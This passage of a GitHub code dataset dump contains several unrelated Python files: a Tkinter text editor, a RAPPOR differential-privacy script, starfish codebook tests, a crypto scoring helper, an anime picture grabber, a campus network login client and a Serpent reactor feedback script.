'__import__', 'abs', 'all', 'any', 'ascii', 'bin', 'breakpoint', 'callable', 'chr', 'compile', 'delattr', 'dir', 'divmod', 'eval', 'exec', 'format', 'getattr', 'globals', 'hasattr', 'hash', 'hex', 'id', 'input', 'isinstance', 'issubclass', 'iter', 'len', 'locals', 'max', 'min', 'next', 'oct', 'ord', 'pow', 'print', 'repr', 'round', 'setattr', 'sorted', 'sum', 'vars', 'open']\r\ndefinitions = []\r\n\r\ndef run_code(event):\r\n\r\n code = text_boxes[tabControl.index(tabControl.select())].get(\"1.0\", END)\r\n\r\n old_stdout = sys.stdout\r\n sys.stdout = mystdout = StringIO()\r\n\r\n exec(code)\r\n\r\n sys.stdout = old_stdout\r\n\r\n message = mystdout.getvalue()\r\n\r\n output = Text(win)\r\n\r\n output.insert(\"1.0\", message)\r\n\r\n output.pack()\r\n\r\n\r\n print(message)\r\n\r\ndef open_selcted_file(event):\r\n \r\n filename = files_list[tree.index(tree.curselection()) - 1]\r\n\r\n filepath = path_list[tree.index(tree.curselection()) - 1]\r\n\r\n add_tab(filename)\r\n\r\n text_bar = Scrollbar(tabs_list[-1]) \r\n \r\n text_bar.pack(side = RIGHT, fill = Y)\r\n\r\n \r\n\r\n text_boxes.append(Text(tabs_list[-1], undo=True, maxundo=-1, autoseparators=True, yscrollcommand = text_bar.set))\r\n\r\n \r\n\r\n text_binds()\r\n\r\n text_boxes[-1].pack(fill = BOTH, expand = True)\r\n\r\n text_bar.config(command = text_boxes[-1].yview)\r\n\r\n try:\r\n read_file = open(filepath, \"rb\")\r\n except PermissionError:\r\n return\r\n\r\n text_boxes[-1].insert(\"1.0\", read_file.read())\r\n\r\n\r\n \r\n\r\n read_file.close()\r\n\r\n\r\ndef open_tree():\r\n\r\n\r\n\r\n global files_list, path_list\r\n\r\n files_list = []\r\n path_list = []\r\n\r\n count = 1\r\n\r\n tree.insert(1, \"Loading your project folder\")\r\n\r\n tree.insert(2, \"please wait...\")\r\n \r\n startpath = filedialog.askdirectory()\r\n\r\n\r\n\r\n \r\n\r\n\r\n for root, dirs, files in os.walk(startpath):\r\n level = root.replace(startpath, '').count(os.sep)\r\n indent = ' ' * 4 * (level)\r\n\r\n tree.insert(count, '{}{}/'.format(indent, \"📁\" + os.path.basename(root)))\r\n \r\n files_list.append(os.path.basename(root))\r\n\r\n path_list.append(root)\r\n \r\n subindent = ' ' * 4 * (level + 1)\r\n\r\n count += 1\r\n\r\n \r\n for f in files:\r\n tree.insert(count, \"{}{}\".format(subindent, f))\r\n \r\n files_list.append(f)\r\n path_list.append(root + \"/\" + f)\r\n\r\n count += 1\r\n\r\n\r\ndef highlighting_syntax(code):\r\n #print(\"hi\")\r\n #keywords\r\n #builtins\r\n #comments\r\n #strings\r\n #definitions\r\n\r\n #pattern = re.compile(\"\")\r\n\r\n #print(re.search(pattern, code))\r\n\r\n code.find(\"#\")\r\n \r\n \r\n \r\n\r\ndef delete_tab(event):\r\n if len(tabs_list) == 1:\r\n win.destroy()\r\n tabControl.forget(tabControl.select())\r\n\r\ndef delete_line(event):\r\n pos = text_boxes[tabControl.index(tabControl.select())].index(CURRENT)\r\n coors = pos.split(\".\")\r\n text_boxes[tabControl.index(tabControl.select())].delete(coors[0] + \".0\", coors[0] + \".100\")\r\n\r\ndef save():\r\n\r\n selected_tab = tabControl.tab(tabControl.select(), \"text\")\r\n\r\n if selected_tab == \"Untitled\":\r\n save_as()\r\n return\r\n \r\n win.title(selected_tab)\r\n \r\n write_file = open(selected_tab, \"w\")\r\n\r\n write_file.write(text_boxes[tabControl.index(tabControl.select())].get(\"1.0\", END))\r\n\r\n write_file.close()\r\n text_boxes[tabControl.index(tabControl.select())].edit_modified(False)\r\n\r\ndef save_shortcut(event):\r\n\r\n selected_tab = tabControl.tab(tabControl.select(), \"text\")\r\n\r\n if selected_tab == \"Untitled\":\r\n save_as()\r\n return\r\n \r\n win.title(selected_tab)\r\n \r\n write_file = open(selected_tab, \"w\")\r\n\r\n write_file.write(text_boxes[tabControl.index(tabControl.select())].get(\"1.0\", END))\r\n\r\n write_file.close()\r\n text_boxes[tabControl.index(tabControl.select())].edit_modified(False)\r\n\r\n\r\ndef changes_made(event):\r\n #print(\"hi\")\r\n #print(text_boxes[tabControl.index(tabControl.select())].edit_modified())\r\n\r\n print(event.char)\r\n\r\n if event.char == \".\":\r\n Listbox(text_boxes[tabControl.index(tabControl.select())]).pack(pady=25, padx=25)\r\n \r\n if text_boxes[tabControl.index(tabControl.select())].edit_modified() != 0:\r\n win.title(\"*\" + tabControl.tab(tabControl.select(), \"text\"))\r\n code = text_boxes[tabControl.index(tabControl.select())].get(\"1.0\", END)\r\n highlighting_syntax(code)\r\n\r\ndef change_tab(event):\r\n selected_tab = tabControl.tab(tabControl.select(), \"text\")\r\n\r\n print(selected_tab)\r\n win.title(selected_tab)\r\n\r\ndef text_binds():\r\n #text_boxes[tabControl.index(tabControl.select())]\r\n text_boxes[-1].bind(\"\", command_prompt)\r\n #text_boxes[tabControl.index(tabControl.select())].bind(\"<>\", changes_made)\r\n text_boxes[-1].bind(\"\", changes_made)\r\n #text_boxes[tabControl.index(tabControl.select())].bind(\"s\", undo)\r\n text_boxes[-1].bind(\"\", save_shortcut)\r\n \r\n text_boxes[-1].bind(\"\", delete_line)\r\n\r\n text_boxes[-1].bind(\"\", delete_tab)\r\n\r\n text_boxes[-1].bind(\"\", run_code)\r\n\r\n\r\n \r\n \r\n\r\ndef new_file():\r\n global text_box\r\n add_tab(\"Untitled\")\r\n\r\n text_bar = Scrollbar(tabs_list[-1]) \r\n \r\n text_bar.pack(side = RIGHT, fill = Y)\r\n \r\n text_boxes.append(Text(tabs_list[-1], undo=True, maxundo=-1, autoseparators=True, yscrollcommand = text_bar.set))\r\n\r\n text_binds()\r\n\r\n text_boxes[-1].pack(fill = BOTH, expand = True)\r\n\r\n\r\n text_bar.config(command = text_boxes[-1].yview)\r\n\r\ndef tabs():\r\n global tabControl\r\n #style = ttk.Style()\r\n #ttk.Style().configure(\"TButton\", padding=6, relief=\"flat\", background=\"#ccc\")\r\n tabControl = ttk.Notebook(win)\r\n tabControl.bind(\"<>\", change_tab)\r\n tabControl.bind(\"\", delete_tab)\r\n tabControl.pack(fill = BOTH, expand = True)\r\n\r\n\r\ndef add_tab(tab_name):\r\n global tab\r\n tabs_list.append(ttk.Frame(tabControl))\r\n tabControl.add(tabs_list[-1], text=tab_name)\r\n \r\n \r\n\r\n\r\ndef open_file():\r\n #global text_box\r\n filename = askopenfilename()\r\n file_content = open(filename, \"rb\")\r\n add_tab(filename)\r\n\r\n text_bar = Scrollbar(tabs_list[-1]) \r\n \r\n text_bar.pack(side = RIGHT, fill = Y)\r\n \r\n \r\n text_boxes.append(Text(tabs_list[-1], undo=True, maxundo=-1, autoseparators=True, yscrollcommand = text_bar.set))\r\n\r\n text_binds()\r\n\r\n text_boxes[-1].pack(fill = BOTH, expand = True)\r\n\r\n text_boxes[-1].insert(\"1.0\", file_content.read())\r\n\r\n text_bar.config(command = text_boxes[-1].yview)\r\n\r\n\r\ndef save_as():\r\n files = [('All Files', '*.*'), \r\n ('Python Files', '*.py'), \r\n ('Text Document', '*.txt')] \r\n file_saved = asksaveasfile(filetypes = files, defaultextension = files)\r\n if file_saved is None:\r\n return\r\n file_saved.write(text_boxes[tabControl.index(tabControl.select())].get(\"1.0\", END))\r\n file_saved.close()\r\n\r\ndef menus():\r\n menu = Menu(win)\r\n win.config(menu=menu)\r\n fileMenu = Menu(menu)\r\n menu.add_cascade(label=\"File\", menu=fileMenu)\r\n fileMenu.add_command(label=\"New\", command=new_file)\r\n fileMenu.add_command(label=\"Save as\", command=save_as)\r\n fileMenu.add_command(label=\"Save\", command=save)\r\n fileMenu.add_command(label=\"Open\", command=open_file)\r\n fileMenu.add_separator()\r\n\r\ndef command_prompt(event):\r\n command = pyautogui.prompt(text='Line Column', title='Coordinate to go to' , default='0 0')\r\n line = int(command.split(\" \")[0])\r\n column = int(command.split(\" \")[1])\r\n text_boxes[tabControl.index(tabControl.select())].mark_set(\"insert\", \"%d.%d\" % (line, column))\r\n text_boxes[tabControl.index(tabControl.select())].see(str(line) + \".\" + str(column))\r\nwin = Tk()\r\n\r\nwin.wm_iconbitmap('imgs/logo.ico')\r\n\r\nwin.title(\"Mline\")\r\n\r\n\r\n\r\nopen_project = Button(win, text=\"Open project\", command=open_tree)\r\n\r\nopen_project.pack(side = TOP)\r\n\r\n \r\ntree_bar = Scrollbar(win) \r\n \r\ntree_bar.pack(side = LEFT, fill = Y)\r\n\r\ntree = Listbox(win, width=25, yscrollcommand = tree_bar.set)\r\n\r\n\r\ntree.bind('<>', open_selcted_file)\r\n\r\ntree.pack(side = LEFT, fill = BOTH)\r\n\r\ntree_bar.config( command = tree.yview )\r\n\r\n\r\ntabs()\r\n\r\nmenus()\r\n\r\n\r\n\r\nwin.mainloop()\r\n","repo_name":"maxikichka/Max-Lines","sub_path":"maxLines 1.0/text_editor.py","file_name":"text_editor.py","file_ext":"py","file_size_in_byte":8924,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"7497049648","text":"\"\"\"\n@author:FZX\n@file:RP.py\n@time:2019/12/11 15:45\n\"\"\"\nimport numpy as np\nimport matplotlib\nmatplotlib.use('TkAgg')\nimport LDP.basicDP.RPbasic as rpb\nimport LDP.basicFunction.basicfunc as bf\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n\n# 关闭科学计数法显示\nnp.set_printoptions(suppress=True)\n\n\"\"\"\n复现RAPPOR中的方法,针对单值问题,即每个用户拥有一个值\n\"\"\"\n\npath = '../LDPMiner/dataset/kosarak/kosarak_10k_singlevalue.csv'\nuser_data = bf.readcsv(path)\nprint('data:\\n', user_data)\n\nmax = np.max(user_data) # 一维数据中的最大值\nmin = np.min(user_data) # 一维数据中的最小值\nn = len(user_data) # 用户i的数量n\nd = max - min + 1 # 用户数据域的维度d\nprint('n=', n, '\\nd=', d)\nlabel = np.unique(user_data)\nx_list = label.tolist()\n\n# onehot编码\nonehot_data = bf.one_hot_1D(user_data)\n# np.savetxt('../LDPMiner/dataset/SH/kosarak_10k_singlevalue_onehot.txt',onehot_data,fmt='%d')\n# print('数据obehot编码:\\n', onehot_data)\n\n\n# 计算每个项的真实频数用于画图\norigin = np.zeros(d)\nfor i in range(n):\n origin = origin + onehot_data[i]\n#print('origin:\\n', origin)\ncount_true=origin.tolist()\nprint(count_true)\n\n\"\"\"\nBasic One-time RAPPOR \n数据已经编码完成,并且只进行一次PRR\n\"\"\"\nepsilon = 2 # eps越大,数据可用性越好,隐私保护水平越低\nf = rpb.gen_f(epsilon)\n\nz_totle = np.zeros(d)\nfor i in range(n):\n z = rpb.PRR_bits(onehot_data[i], f)\n z_totle = z_totle + z\nprint(z_totle)\n\nest = np.zeros(d)\nfor j in range(d):\n est[j] = rpb.decoder_PRR(z_totle[j], n, f)\nprint('estimate:\\n', est)\ncount_estimate=est.tolist()\n\n# 画图\nplt.bar(x_list, +origin)\nplt.bar(x_list, -est)\nplt.show()\n\nresult={\"RAPPOR\":count_estimate,\"true\":count_true,\"value\":x_list}\ndf_res=pd.DataFrame(result)\n#df_res.to_csv(\"../LDPMiner/dataset/kosarak/result/10k_sv_RP.csv\",index=False)","repo_name":"MicroFANs/DifferentialPrivacywork","sub_path":"LDP/LDPMiner/RP.py","file_name":"RP.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"18040313654","text":"\"\"\"\nTests for codebook.metric_decode method\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport pytest\n\nfrom starfish import IntensityTable\nfrom starfish.core.types import Axes, Features, SpotAttributes\nfrom ..codebook import Codebook\n\n\ndef intensity_table_factory(data: np.ndarray=np.array([[[0, 3], [4, 0]]])) -> IntensityTable:\n \"\"\"\n Produces an IntensityTable with a single feature that was measured over 2 channels and 2 rounds.\n \"\"\"\n\n # generates spot attributes equal in size to the number of passed features.\n # each attribute has coordinates (z, y, x) equal to the feature index, and radius 1.\n spot_attributes_data = pd.DataFrame(\n data=np.array([[i, i, i, 1] for i in np.arange(data.shape[0])]),\n columns=[Axes.ZPLANE, Axes.Y, Axes.X, Features.SPOT_RADIUS]\n )\n\n intensity_table = IntensityTable.from_spot_data(\n data,\n SpotAttributes(spot_attributes_data),\n ch_values=np.arange(data.shape[1]),\n round_values=np.arange(data.shape[2]),\n )\n return intensity_table\n\n\ndef codebook_factory() -> Codebook:\n \"\"\"\n Codebook with two codewords describing an experiment with three channels and two imaging rounds.\n Both codes have two \"on\" channels.\n \"\"\"\n codebook_array = [\n {\n Features.CODEWORD: [\n {Axes.ROUND.value: 0, Axes.CH.value: 1, Features.CODE_VALUE: 1},\n {Axes.ROUND.value: 1, Axes.CH.value: 0, Features.CODE_VALUE: 1}\n ],\n Features.TARGET: 'GENE_A'\n },\n {\n Features.CODEWORD: [\n {Axes.ROUND.value: 1, Axes.CH.value: 0, Features.CODE_VALUE: 1},\n {Axes.ROUND.value: 1, Axes.CH.value: 1, Features.CODE_VALUE: 1}\n ],\n Features.TARGET: 'GENE_B'\n },\n ]\n return Codebook.from_code_array(codebook_array)\n\n\ndef test_metric_decode():\n \"\"\"\n This test exposes 3 test features, each the the same normalized trace.\n The first should decode to GENE_A, and pass both the intensity and distance filters\n The second should decode to GENE_B, but fail the intensity filter\n The third should decode to GENE_B, as it is less far from that gene than GENE_A, but\n should nevertheless fail the distance filter because the tiles other than (0, 0) don't\n match\n \"\"\"\n data = np.array(\n [[[0, 4], # this code is decoded \"right\"\n [3, 0]],\n [[0, 0], # this code should be filtered based on magnitude\n [0.4, 0.3]],\n [[30, 0], # this code should be filtered based on distance\n [0, 40]]]\n )\n intensities = intensity_table_factory(data)\n codebook = codebook_factory()\n\n decoded_intensities = codebook.decode_metric(\n intensities,\n max_distance=0.5,\n min_intensity=1,\n norm_order=1\n )\n\n assert hasattr(decoded_intensities, Features.DISTANCE)\n\n assert decoded_intensities.sizes[Features.AXIS] == 3\n\n assert np.array_equal(\n decoded_intensities[Features.TARGET].values,\n ['GENE_A', 'GENE_B', 'GENE_B'],\n )\n\n assert np.array_equal(\n decoded_intensities[Features.PASSES_THRESHOLDS].values,\n [True, False, False]\n )\n\n assert not np.all(decoded_intensities == intensities)\n\n\ndef test_unmatched_intensities_and_codebook_table_sizes_throws_value_error():\n \"\"\"\n Codebook and Intensity channel and round number must match. Here we use a codebook with 3\n channels, but an IntensityTable with only 2 to verify an error is thrown.\n \"\"\"\n\n # this codebook has 3 channels\n codebook_array = [\n {\n Features.CODEWORD: [\n {Axes.ROUND.value: 0, Axes.CH.value: 2, Features.CODE_VALUE: 1},\n {Axes.ROUND.value: 1, Axes.CH.value: 0, Features.CODE_VALUE: 1}\n ],\n Features.TARGET: 'GENE_A'\n },\n ]\n codebook = Codebook.from_code_array(codebook_array)\n intensities = intensity_table_factory()\n with pytest.raises(ValueError):\n codebook.decode_metric(intensities, max_distance=0.5, min_intensity=1, norm_order=1)\n","repo_name":"spacetx/starfish","sub_path":"starfish/core/codebook/test/test_metric_decode.py","file_name":"test_metric_decode.py","file_ext":"py","file_size_in_byte":4091,"program_lang":"python","lang":"en","doc_type":"code","stars":220,"dataset":"github-code","pt":"37"} +{"seq_id":"27994637301","text":"from collections import defaultdict\nfrom decimal import Decimal\n\nfrom lib.helpers import to_decimal\n\n\ndef format_scorechain_response(signals_data, score_percent_key='percent'):\n \"\"\"\n Translate ScoreChain relations into signals\n\n \"relationships\": [\n {\n \"type\": \"exchange\",\n \"label\": \"string\",\n \"address\": \"string\",\n \"value\": 0.42,\n \"percent\": 13,\n \"scx\": 37\n },\n {\n \"type\": \"Miners\",\n \"label\": \"string\",\n \"address\": \"string\",\n \"value\": 0.42,\n \"percent\": 24,\n \"scx\": 37\n },\n ]\n\n [ exchange, MIXING, Miners, Neutral, OFAC Sanction list,\n ToBig, cloudmining, darkweb, gambling, miners, mixing,\n scammer, service ]\n \"\"\"\n default_signals = {\n 'dark_market': 0,\n 'dark_service': 0,\n 'exchange': 0,\n 'trusted_exchange': 0,\n 'gambling': 0,\n 'illegal_service': 0,\n 'marketplace': 0,\n 'miner': 0,\n 'mixer': 0,\n 'payment': 0,\n 'ransom': 0,\n 'scam': 0,\n 'stolen_coins': 0,\n 'wallet': 0,\n 'service': 0,\n 'neutral': 0,\n 'sanction': 0,\n 'unknown': 0,\n }\n default_data = defaultdict(Decimal)\n\n for relationship in signals_data:\n value = to_decimal(relationship[score_percent_key]) / 100\n key = get_signal_type_from_response(relationship['type'])\n default_data[key] += value\n\n result = dict(default_signals)\n result.update(default_data)\n result = {k: str(val) for k, val in result.items()}\n return result\n\n\ndef get_signal_type_from_response(rel_type: str):\n rel_type = rel_type.lower()\n # map types\n if rel_type == 'darkweb':\n key = 'dark_market'\n elif rel_type == 'dex':\n key = 'dex'\n elif rel_type == 'exchange':\n key = 'trusted_exchange'\n elif rel_type == 'gambling':\n key = 'gambling'\n elif rel_type in ('miners', 'cloudmining'):\n key = 'miner'\n elif rel_type in ('mixing', 'mixing service',):\n key = 'mixer'\n elif rel_type == 'scammer':\n key = 'scam'\n elif rel_type == 'service':\n key = 'service'\n elif rel_type == 'neutral':\n key = 'neutral'\n elif rel_type == 'ofac sanction list':\n key = 'sanction'\n else:\n key = 'unknown'\n return key\n","repo_name":"Polygant/OpenCEX-backend","sub_path":"cryptocoins/scoring/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"7953583061","text":"import os\n\nimport requests\n\nfrom core.exceptions import PictureNotFoundException, TagsNotFoundException, EcchiDeniedException, \\\n HentaiDeniedException, DownloadErrorException\nfrom core.utils import logger\nfrom core.utils.json_handler import json_handler\nfrom .konachan_grabber import KonachanGrabber as KonaGrabber\nfrom .yandere_grabber import YandereGrabber as YandeGrabber\n\n\nclass PictureGrabber(object):\n \"\"\"\n Unified grabber for konachan and yandere\n \"\"\"\n\n _kon = None\n _ya = None\n\n @logger.class_construct\n def __init__(self):\n self._kon = KonaGrabber()\n self._ya = YandeGrabber()\n\n @logger.log_func\n def get_picture(self, tags, rating, from_user):\n \"\"\"\n Get picture\n\n :param tags: picture tags\n :param rating: picture rating\n :param from_user: type of chat message from\n :raise: PictureNotFoundException if picture not found\n :raise: TagsNotFoundException if request picture without tags\n :raise: EcchiDeniedException if request ecchi in non private chat\n :raise: HentaiDeniedException if request hentai on non private chat\n :rtype: None\n \"\"\"\n\n logger.info(\"PictureGrabber get_picture()\")\n\n if (not from_user) and rating != \"safe\":\n if rating == \"questionable\":\n logger.info(\"Request ecchi in non private chat. Denied. Current rating: '\" + str(rating) + \"'\")\n raise EcchiDeniedException\n else:\n logger.info(\"Request hentai on non private chat. Denied. Current rating: '\" + str(rating) + \"'\")\n raise HentaiDeniedException\n\n logger.debug(\"Join tags list by '+'\")\n if isinstance(tags, list):\n if len(tags) != 0:\n tags = '+'.join(tags)\n logger.info(\"Tags in request: '\" + str(tags) + \"'\")\n else:\n logger.info(\"Not found tags in request. Raise TagsNotFoundException\")\n raise TagsNotFoundException\n\n url, picture_hash = self._kon.get_picture(tags, rating)\n logger.debug(\"Get url '\" + str(url) + \"' and hash '\" + str(picture_hash) + \"'\")\n\n if picture_hash != \"\":\n logger.info(\"Found picture in Konachan. Returning\")\n\n self._download_picture(url)\n\n else:\n logger.info(\"Not found picture in Konachan. Continue\")\n\n url, picture_hash = self._ya.get_picture(tags, rating)\n logger.debug(\"Get url '\" + str(url) + \"' and hash '\" + str(picture_hash) + \"'\")\n\n if picture_hash != \"\":\n logger.info(\"Found picture in Yandere. Returning\")\n\n self._download_picture(url)\n else:\n logger.info(\"Not found picture in Yandere. Raise PictureNotFoundException\")\n raise PictureNotFoundException()\n\n @logger.log_func\n def _download_picture(self, url):\n \"\"\"\n Download picture as file from url\n\n :param url: url for downloading\n :raise: PictureNotFoundException if error occurring while downloading\n :rtype: None\n \"\"\"\n try:\n raw_picture = requests.get(url)\n picture = open(\"pictures\" + os.path.sep + json_handler.constants['default_picture_file'], 'wb')\n for chunk in raw_picture.iter_content(chunk_size=512 * 1024):\n if chunk:\n picture.write(chunk)\n picture.close()\n\n except Exception as e:\n logger.debug(\"Error download with exception: \" + str(e))\n raise DownloadErrorException()\n","repo_name":"AnyKeyShik/Bismarck","sub_path":"core/utils/pictures/picture_grabber.py","file_name":"picture_grabber.py","file_ext":"py","file_size_in_byte":3595,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"72796707626","text":"import re\nimport json\nimport requests as req\nimport urllib\nfrom urllib.parse import urlparse, parse_qs\nimport urllib.parse\n\n# 封装post请求\ndef post(url, headers={}, data={}):\n data = bytes(urllib.parse.urlencode(data), encoding=\"utf-8\")\n request = urllib.request.Request(url, headers=headers, data=data)\n response = urllib.request.urlopen(request)\n return response\n\n\n# 封装get请求\ndef get(url, headers={}):\n request = urllib.request.Request(url, headers=headers)\n response = urllib.request.urlopen(request)\n\n return response\n\n\nclass Netlogin:\n def __init__(self,args):\n \"\"\"\n 登陆服务\n 0:校园网\n 1:中国移动\n 2:中国联通\n 3:中国电信\n \"\"\"\n self.services = {\n \"0\": \"%e6%a0%a1%e5%9b%ad%e7%bd%91\",\n \"1\": \"%E4%B8%AD%E5%9B%BD%E7%A7%BB%E5%8A%A8\",\n \"2\": \"%e4%b8%ad%e5%9b%bd%e8%81%94%e9%80%9a\",\n \"3\": \"%e4%b8%ad%e5%9b%bd%e7%94%b5%e4%bf%a1\",\n }\n self.url = \"http://auth.ysu.edu.cn/eportal/InterFace.do?method=\"\n self.header = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134\",\n \"Accept-Encoding\": \"identify\",\n }\n self.isLogined = None\n self.alldata = None\n self.args = args\n\n def tst_net(self):\n \"\"\"\n 测试网络是否认证\n :return: 是否已经认证\n \"\"\"\n res = req.get(\"http://auth.ysu.edu.cn\", headers=self.header)\n\n if res.url.find(\"success.jsp\") > 0:\n cont = urlparse(res.url)\n params = parse_qs(cont.query)\n userIndex = params[\"userIndex\"]\n # print(userIndex)\n userres = req.post(\n \"http://auth.ysu.edu.cn/eportal/InterFace.do?method=getOnlineUserInfo\",\n data={\"userIndex\": userIndex},\n )\n userres.encoding = \"u8\"\n userinfo = userres.json()\n self.isLogined = True\n return {\n \"user\": userinfo[\"userName\"],\n \"isp\": userinfo[\"service\"],\n \"ip\": userinfo[\"userIp\"],\n }, True\n else:\n self.isLogined = False\n return None, self.isLogined\n\n def isCode(self):\n \"\"\"\n 检测是否需要输入验证码\n 未开放\n :return:是否需要验证码\n \"\"\"\n pass\n\n return False\n\n def login(self, user, pwd, type, code=\"\"):\n \"\"\"\n 输入参数登入校园网,自动检测当前网络是否认证。\n :param user:登入id\n :param pwd:登入密码\n :param type:认证服务\n :param code:验证码\n :return:元祖第一项:是否认证状态;第二项:详细信息\n \"\"\"\n if self.isLogined == None:\n self.tst_net()\n if self.isLogined == False:\n if user == \"\" or pwd == \"\":\n return (False, \"用户名或密码为空\")\n self.data = {\n \"userId\": user,\n \"password\": pwd,\n \"service\": self.services[str(type)],\n \"operatorPwd\": \"\",\n \"operatorUserId\": \"\",\n \"validcode\": code,\n \"passwordEncrypt\": \"False\",\n }\n res = get(\"http://auth.ysu.edu.cn\", headers=self.header)\n queryString = re.findall(\n r\"href='.*?\\?(.*?)'\", res.read().decode(\"utf-8\"), re.S\n )\n self.data[\"queryString\"] = queryString[0]\n\n res = post(self.url + \"login\", headers=self.header, data=self.data)\n login_json = json.loads(res.read().decode(\"utf-8\"))\n self.userindex = login_json[\"userIndex\"]\n # self.info = login_json\n self.info = login_json[\"message\"]\n if login_json[\"result\"] == \"success\":\n return (True, \"认证成功\")\n else:\n return (False, self.info)\n\n return (True, \"已经在线\")\n\n def get_alldata(self):\n \"\"\"\n 获取当前认证账号全部信息\n #!!!注意!!!#此操作会获得账号alldata['userId']姓名alldata['userName']以及密码alldata['password']\n :return:全部数据的字典格式\n \"\"\"\n res = get(\n \"http://auth.ysu.edu.cn/eportal/InterFace.do?method=getOnlineUserInfo\",\n headers=self.header,\n )\n try:\n self.alldata = json.loads(res.read().decode(\"utf-8\"))\n except json.decoder.JSONDecodeError as e:\n print(\"数据解析失败,请稍后重试。\")\n\n return self.alldata\n\n def logout(self):\n \"\"\"\n 登出,操作内会自动获取特征码\n :return:元祖第一项:是否操作成功;第二项:详细信息\n \"\"\"\n if self.alldata == None:\n self.get_alldata()\n\n res = get(self.url + \"logout\", headers=self.header)\n logout_json = json.loads(res.read().decode(\"utf-8\"))\n # self.info = logout_json\n self.info = logout_json[\"message\"]\n\n if logout_json[\"result\"] == \"success\":\n return (True, \"下线成功\")\n else:\n return (False, self.info)\n\n","repo_name":"angshn/tools","sub_path":"auth/netlogin.py","file_name":"netlogin.py","file_ext":"py","file_size_in_byte":5307,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"36260759821","text":"#!/usr/bin/env python\n#\n# This script will check thermal reactivity coefficients of both\n# the fuel and the graphite. TMP method for doppler broadening is\n# used by default.\n#\n# PyNE, *is* needed, although the crazy installation stuff isn't needed.\n# we just import what we need directly in order to follow the DRY philosophy.\n# just make sure this line is in your bashrc:\n# export PYTHONPATH=$HOME//pyne/pyne:${PYTHONPATH}\n#\n# after doing this, since we don't care about the rest of the PyNE stuff\n# and don't want to deal with potentially painful installation, comment out\n# any line containing \"QAWarning\".\n\nimport copy\nfrom scipy.optimize import curve_fit\nimport time\nimport os\nimport sys\nimport pickle as pk\nimport re\nimport RefuelCore\nimport shutil\nimport serpent\nimport progressbar\n\ndef getKeffSigma(filename):\n \"\"\" Gets keff and sigma from the serpent input file. \"\"\"\n res = serpent.parse_res(filename)\n\n # return ABS_KEFF since it usually seems to have the lower\n # uncertainty\n keff, sigma = res['ABS_KEFF'][0]\n\n # sigma DEFINITELY is not fractional.\n return keff, sigma\n\n\ndef getDoppGeomVoidIsFeedback(name):\n \"\"\" returns a length 4 tuple of booleans.\n The first through fourth are respectively\n whether the filename has a name matching how\n submitJob names feedback experiments, whether the\n filename has doppler, whether it has geometry expansion,\n and whether it has salt voiding.\"\"\"\n\n # regex for feedback files\n pattern = re.compile(\"^Day[0-9]*Temp[0-9]*.*\")\n doppRe = re.compile(\".*Dopp.*\")\n geomRe = re.compile(\".*Geom.*\")\n voidRe = re.compile(\".*Void.*\")\n\n return tuple(map(bool, [pattern.match(name), doppRe.match(name),\n geomRe.match(name), voidRe.match(name)]))\n\n\ndef collectResults(outFileName, sep=\" \", header=True):\n \"\"\" Collects feedback results in a text file from feedback numeric\n experiments. The file includes a header by default to describe\n columns. The default columns separator is whitespace. \n\n All results including doppler, geometry, and voiding get put\n in the file. Some boolean-valued colulmns describe if the \n feedback mechanism is present. eg a column for voiding has a 0\n if not voided, 1 otherwise.\n\n Args :\n None\n Kwargs :\n sep - string. separator of fields in each row.\n header - bool. whether to include a comment line\n at the top of the output file.\n\n \"\"\"\n # regex for finding numbers\n numberPattern = re.compile(\"Temp[0-9]*\")\n dayPattern = re.compile(\"Day[0-9]*\")\n\n outFileHandle = open(outFileName, 'w')\n\n ls = os.listdir('.')\n\n # make a progress bar\n bar = progressbar.ProgressBar(redirect_stdout=True, max_value=len(ls))\n i = 0\n\n # write a header if desired\n if header:\n outFileHandle.write(\"# day, rho, rhosigma, temp, hasDoppler, hasGeomExpand,\"\n \"hasSaltVoiding\\n\")\n for filename in ls:\n \n # check if this is a directory matching the name\n # of a feedback results file.\n isfeedback, isdopp, isgeom, isvoid = getDoppGeomVoidIsFeedback(filename)\n if not isfeedback:\n # not what we're looking for then\n continue\n\n # ok, this is one we're interested in\n os.chdir(filename)\n\n ## grab implicit keff estimate and its uncertainty\n doppstr = 'Dopp' if isdopp else ''\n geomstr = 'Geom' if isgeom else ''\n voidstr = 'Void' if isvoid else ''\n templist = [patt for patt in numberPattern.findall(filename) if patt != '']\n if len(templist) != 1:\n raise Exception(\n \"More than one or 0 temperature found in {}\".format(filename))\n temperature = float(templist[0][4:])\n daylist = [patt for patt in dayPattern.findall(filename) if patt != '']\n if len(daylist) != 1:\n raise Exception(\n \"More than one or 0 day found in {}\".format(filename))\n day = float(daylist[0][3:])\n\n # deduce filename\n outfilename = ('basicDMSR' + str(int(temperature)) + doppstr + geomstr +\n voidstr + '_res.m')\n try:\n keff, sigma = getKeffSigma(outfilename)\n except IOError:\n print(\"It appears that {} isn't done. Continuing anyways.\".format(\n filename))\n os.chdir('..')\n i += 1\n bar.update(i)\n continue\n rho = (keff - 1.0) / keff\n drho = sigma / keff**2 # rho uncertainty\n\n data = [day, rho, drho, temperature, int(isdopp), int(isgeom), int(isvoid)]\n data = map(str, data)\n outFileHandle.write( sep.join(data) + \"\\n\")\n\n # progress!\n i += 1\n bar.update(i)\n\n os.chdir('..')\n\n outFileHandle.close()\n\ndef submitJob(day, inputfileslog, \n doppler=False,\n geometry=False,\n voiding=False,\n overwrite=False,\n queue='gen5', ppn=8, verb=False, nnodes=1):\n \"\"\"Submits jobs that checks feedback coefficient at\n a specified day under an arbitrary combination of feedback\n mechanisms. Doppler, salt expansion, and graphite expansion\n are considered separately.\n\n A directory is made of the form\n\n Args :\n day - day of the depletion simulation to test feedback at.\n must be present in the inputfileslog directory.\n inputfileslog - directory containing SerpentInputFile 